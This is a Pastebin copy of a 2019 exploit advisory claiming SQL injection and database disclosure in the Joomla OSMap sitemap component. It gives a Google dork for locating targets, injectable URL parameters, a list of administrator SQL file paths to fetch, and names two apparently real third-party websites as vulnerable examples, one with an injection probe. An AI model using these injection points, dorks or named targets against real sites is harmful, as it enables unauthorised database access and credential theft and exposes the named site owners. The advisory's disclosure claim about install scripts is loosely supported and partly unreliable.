Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla OSMap Components 4.2.19 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : joomlashack.com
- # Software Download Link : joomlashack.com/joomla-extensions/osmap/
- github.com/OSTraining/OSMap/archive/master.zip
- github.com/pabloarias/Joomla3-Base/tree/master/administrator/components/com_osmap
- # Software Information Link : extensions.joomla.org/extension/osmap/
- github.com/OSTraining/OSMap
- # Software Version : 4.2.19 and all previous versions.
- # Software Price : 39$ and 49$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_osmap''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- OSMap - the easiest way to create a Joomla sitemap.
- OSMap is a Joomla sitemap generator. It will build an SEO-friendly XML
- sitemap for Google and other search engines.
- It will also build an HTML sitemap for your visitors.
- ####################################################################
- # Impact :
- ***********
- * Joomla OSMap Components 4.2.19 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_osmap&view=html&id=[SQL Injection]
- /index.php?option=com_osmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_osmap&view=xml&tmpl=component&id=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_osmap/sql/install/mysql/utf8.sql
- /administrator/components/com_osmap/sql/uninstall/mysql/utf8.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/3.3.0.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/3.3.1.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/3.4.0.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/3.4.1.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.0.0.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.0.1.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.0.2.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.0.3.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.0.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.1.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.2.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.3.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.4.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.1.5.sql
- /administrator/components/com_osmap/sql/updates/mysql/utf8/4.2.0.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] heinrichheinedo.de/index.php?option=com_osmap&view=html&id=1%27
- [+] staszickutno.pl/jbip/administrator/components/com_osmap/sql/install/mysql/utf8.sql
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Warning: Parameter 1 to osmap_com_k2::getTree() expected to be a
- reference, value given in /www/htdocs/v088159/2017/administrator
- /components/com_osmap/library/alledia/osmap/Helper/General.php on line 378
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment